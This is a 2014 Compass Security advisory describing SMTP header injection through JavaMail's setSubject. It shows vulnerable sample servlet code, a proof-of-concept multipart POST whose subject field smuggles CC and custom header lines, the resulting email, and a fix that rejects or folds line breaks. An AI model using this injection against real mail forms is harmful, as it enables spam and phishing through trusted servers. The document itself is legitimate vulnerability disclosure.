JavaMail SMTP Header Injection via method setSubject [CSNC-2014-
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: JavaMail
# Vendor: Oracle
# CSNC ID: CSNC-2014-001
# CVD ID: <none>
# Subject: SMTP Header Injection via method setSubject
# Risk: Medium
# Effect: Remotely exploitable
# Author: Alexandre Herzog <alexandre.herzog@csnc.ch>
# Date: 19.05.2014
#
#############################################################
Introduction:
-------------
The JavaMail API provides a platform-independent and
protocol-independent framework to build mail and messaging applications.
The JavaMail API is available as an optional package for use with the
Java SE platform and is also included in the Java EE platform.[1]

JavaMail does not check if the email subject contains a Carriage Return
(CR) or a Line Feed (LF) character on POST multipart requests. This
issue allows the injection of arbitrary SMTP headers in the generated
email. This flaw can be used for sending SPAM or other social
engineering attacks (e.g. abusing a trusted server to send HTML emails
with malicious content).

Affected:
---------
The following versions of JavaMail were tested and found vulnerable:
- 1.4.5 (included in the .war file used as demo from [2])
- 1.5.1 (latest version downloaded on 31.12.2013 from [3])

Technical Description
---------------------
The tests were performed using the .war file downloaded from [2]. That
code features an example of how to send a file by email using JSP and
a servlet. The relevant parts of this example are:

[...]
/**
 * A utility class for sending e-mail message with attachment.
 * @author www.codejava.net
 *
 */
public class EmailUtility {

    /**
     * Sends an e-mail message from a SMTP host with a list of attached files.
     *
     */
    public static void sendEmailWithAttachment(String host, String port,
            final String userName, final String password, String toAddress,
            String subject, String message, List<File> attachedFiles)
                    throws AddressException, MessagingException {
        // sets SMTP server properties
        Properties properties = new Properties();
        properties.put("mail.smtp.host", host);
        properties.put("mail.smtp.port", port);
        properties.put("mail.smtp.auth", "true");
        properties.put("mail.smtp.starttls.enable", "true");
        properties.put("mail.user", userName);
        properties.put("mail.password", password);

        // creates a new session with an authenticator
        Authenticator auth = new Authenticator() {
            public PasswordAuthentication getPasswordAuthentication() {
                return new PasswordAuthentication(userName, password);
            }
        };
        Session session = Session.getInstance(properties, auth);

        // creates a new e-mail message
        Message msg = new MimeMessage(session);

        msg.setFrom(new InternetAddress(userName));
        InternetAddress[] toAddresses = { new InternetAddress(toAddress) };
        msg.setRecipients(Message.RecipientType.TO, toAddresses);
==>     msg.setSubject(subject);
        msg.setSentDate(new Date());
[...]

[...]
/**
 * A servlet that takes message details from user and send it as a new e-mail
 * through an SMTP server. The e-mail message may contain attachments which
 * are the files uploaded from client.
 *
 * @author www.codejava.net
 *
 */
@WebServlet("/SendMailAttachServlet")

// CSNC comment - this tag enables the processing of POST multipart requests
@MultipartConfig(fileSizeThreshold = 1024 * 1024 * 2, // 2MB
        maxFileSize = 1024 * 1024 * 10,      // 10MB
        maxRequestSize = 1024 * 1024 * 50)   // 50MB
public class SendMailAttachServlet extends HttpServlet {
    private String host;
    private String port;
    private String user;
    private String pass;

    public void init() {
        // reads SMTP server setting from web.xml file
        ServletContext context = getServletContext();
        host = context.getInitParameter("host");
        port = context.getInitParameter("port");
        user = context.getInitParameter("user");
        pass = context.getInitParameter("pass");
    }

    /**
     * handles form submission
     */
    protected void doPost(HttpServletRequest request,
            HttpServletResponse response) throws ServletException, IOException {

        List<File> uploadedFiles = saveUploadedFiles(request);

        String recipient = request.getParameter("recipient");
==>     String subject = request.getParameter("subject");
        String content = request.getParameter("content");

        String resultMessage = "";

        try {
==>         EmailUtility.sendEmailWithAttachment(host, port, user, pass,
                    recipient, subject, content, uploadedFiles);

            resultMessage = "The e-mail was sent successfully";
        } catch (Exception ex) {

Below is a genuine POST request for the example above, done
using "Content-Type: multipart" as it involves uploading a file:

POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1785

-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"

test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"

With javax.mail.1.5.1
-----------------------------205721274512326
Content-Disposition: form-data; name="content"

SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]

"Content-Type: multipart" allows us to submit a string containing a CR
or LF without having to use the hex encodings %0A and %0D or the escapes
\n and \r. In the JavaMail case, we abuse this feature to inject
additional SMTP headers through the Subject parameter in the request:

POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1839

-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"

test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"

With javax.mail.1.5.1
==> CC: injected.header@[redacted]
==> X-other-header: foo bar
-----------------------------205721274512326
Content-Disposition: form-data; name="content"

SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]

This email is sent successfully and is received by the recipient under
the following form, where the injected SMTP headers are clearly visible:

[...]
From: [redacted]@gmail.com
To: test@[redacted]
Message-ID: <52c2e778.01030e0a.7154.fffff0c2@mx.google.com>
Subject: With javax.mail.1.5.1
CC: injected.header@[redacted]
==> X-other-header: foo bar
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_Part_0_1681986934.1388504951836"
[...]
------=_Part_0_1681986934.1388504951836
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

SMTP header injection test
------=_Part_0_1681986934.1388504951836
Content-Type: application/octet-stream; name=NOTICE
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=NOTICE

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]

The same behavior can be observed when using JavaMail 1.4.5 (bundled by
default in the example .war [2]) instead of the latest 1.5.1 JavaMail
version.

Workaround / Fix:
-----------------
Ensure your application strictly follows the JavaMail API and ensures
the subject string does not contain any line breaks (as stated in some
parts of the API [4]). An alternative would be to fix the setSubject
method of JavaMail by either disallowing the usage of CR/LF characters
or appending a space after each CR/LF character to be RFC compliant (see
2.2.3 Long Header Fields of RFC 2822 [5]).

Oracle issued the following statement regarding this matter: "The
assessment from our engineering team is that this is not a bug in
JavaMail API. The application is responsible to perform some input
validation. In this particular case, the application is responsible for
ensuring that the subject string does not contain any line breaks. The
code demonstrated the issue is not an Oracle sample. Therefore, we are
closing the issue as not-a-bug."
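
The two options named in this section (rejecting CR/LF, or folding each break per RFC 2822 2.2.3), sketched as an added example that is not code from the advisory, from JavaMail or from the sample application. The class SubjectGuard, its method names and the placeholder address are assumptions; an application would call one of the two methods on the value before passing it to msg.setSubject(subject).

```java
import java.util.regex.Pattern;

// Added example: SubjectGuard and its methods are hypothetical names,
// not part of JavaMail or of the advisory's sample application.
public final class SubjectGuard {
    // A CR or LF plus any whitespace around it; a run collapses to one break.
    private static final Pattern BREAK = Pattern.compile("\\s*[\\r\\n]\\s*");

    private SubjectGuard() {}

    // Option 1: disallow CR/LF. Call before msg.setSubject(subject).
    public static String requireSingleLine(String subject) {
        if (subject == null || subject.indexOf('\r') >= 0 || subject.indexOf('\n') >= 0) {
            throw new IllegalArgumentException("subject must be a single line");
        }
        return subject;
    }

    // Option 2: make every break an RFC 2822 fold (CRLF + one space) so the
    // text after it stays part of the Subject field instead of a new header.
    public static String foldLineBreaks(String subject) {
        // trim() drops leading/trailing breaks that would leave an empty fold line
        return BREAK.matcher(subject.trim()).replaceAll("\r\n ");
    }

    // Counts header fields in a serialized header block: a line that starts
    // with a space or tab continues the previous field (RFC 2822, 2.2.3).
    public static int countHeaderFields(String headerBlock) {
        int fields = 0;
        for (String line : headerBlock.split("\r\n|\r|\n")) {
            if (!line.isEmpty() && line.charAt(0) != ' ' && line.charAt(0) != '\t') {
                fields++;
            }
        }
        return fields;
    }

    public static void main(String[] args) {
        // Constructed input modelled on the advisory's request; placeholder address.
        String subject = "With javax.mail.1.5.1\r\nCC: injected.header@example.invalid\r\n"
                + "X-other-header: foo bar";

        System.out.println("unchecked: "
                + countHeaderFields("Subject: " + subject) + " header fields");
        System.out.println("folded:    "
                + countHeaderFields("Subject: " + foldLineBreaks(subject)) + " header field");
        try {
            requireSingleLine(subject);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected:  " + e.getMessage());
        }
    }
}
```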

Timeline:
---------
2014-05-19: Global publication of the advisory
2014-03-19: Advisory sent to Compass Security's customers
2014-02-19: Got confirmation from Oracle that they agree with our
            publication schedule
2014-02-18: Informed Oracle that we plan to publish details of this
            issue to our customers this week and to the general
            public in a month
2014-02-05: Informed Oracle we consider publishing this information
2014-02-04: Response from Oracle: is not considered a bug
2014-01-23: Status report from Oracle mentioning the case being
            "Under investigation / Being fixed in main codeline"
2014-01-01: Reception acknowledgement from Oracle
2014-01-01: Sending advisory and PoC to Oracle
2014-01-01: Isolation and reproduction of an issue discovered
            previously by the author

References:
-----------
[1] http://www.oracle.com/technetwork/java/javamail/index.html
[2] http://www.codejava.net/java-ee/jsp/send-attachments-with-e-mail-using-jsp-servlet-and-javamail
[3] https://java.net/projects/javamail/pages/Home
[4] https://javamail.java.net/nonav/docs/api/javax/mail/internet/MimeMessage.html#setSubject(java.lang.String)
[5] http://www.ietf.org/rfc/rfc2822.txt
--
Alexandre Herzog, CTO, Compass Security Schweiz AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
http://www.csnc.ch/